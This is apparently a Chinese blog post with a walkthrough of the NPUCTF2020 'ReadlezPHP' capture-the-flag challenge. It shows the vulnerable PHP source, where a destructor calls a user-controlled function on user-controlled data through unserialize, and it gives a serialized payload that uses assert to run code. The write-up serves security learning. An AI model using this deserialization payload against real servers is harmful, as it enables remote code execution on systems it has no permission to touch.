PHP教程
[NPUCTF2020]ReadlezPHP
[NPUCTF2020]ReadlezPHP
1.先查看源码,得到地址
2.
2.得到一个源码,一看应该就是反序列化题
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a); 这里可以利用一下,也就是说如果将$b赋值为函数,$a赋值为命令,就能执行我们想执行的命令。
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
这段是显示源码用的
@$ppp = unserialize($_GET["data"]);
<?php
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "phpinfo();";
$this->b = "assert";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp();
echo serialize($c);
?>
(刚开始我是用的system,而不是assert,但是一直没有回显,就百度了下大佬的wp,发现system被过滤了)
payload: ?data=O:8:"HelloPhp":2:{s:1:"a";s:10:"phpinfo();";s:1:"b";s:6:"assert";}
然后再搜索一下flag信息就能得到flag
-
env: php: no such file or directory03-29
-
php foreach break03-01
-
Exception参数 php-icode9专业技术文章分享02-26
-
PHP文件批量上传-icode9专业技术文章分享12-30
-
thinkphp6 withJoin-icode9专业技术文章分享12-30
-
MagicArray:像php一样,让Go业务代码不再卷!12-27
-
centos7编译安装PHP教程。11-18
-
centos7编译安装phpMyAdmin教程。11-18
-
唱衰这么多年,PHP 仍然还是你大爷!10-13
-
PHP8,性能更好,语法更好,类型安全更完善07-25
-
PHP语言的优势、发展趋势是什么?近年来有哪些重要的更新和改进?07-25
-
Liunx下对php内核的调试06-25
-
浅谈 thinkphp composer 扩展包加载原理06-15
-
基于php的外卖订餐网站(php+mysql)06-11
-
MAC 上搭建lnmp环境 && 安装php相关扩展05-22
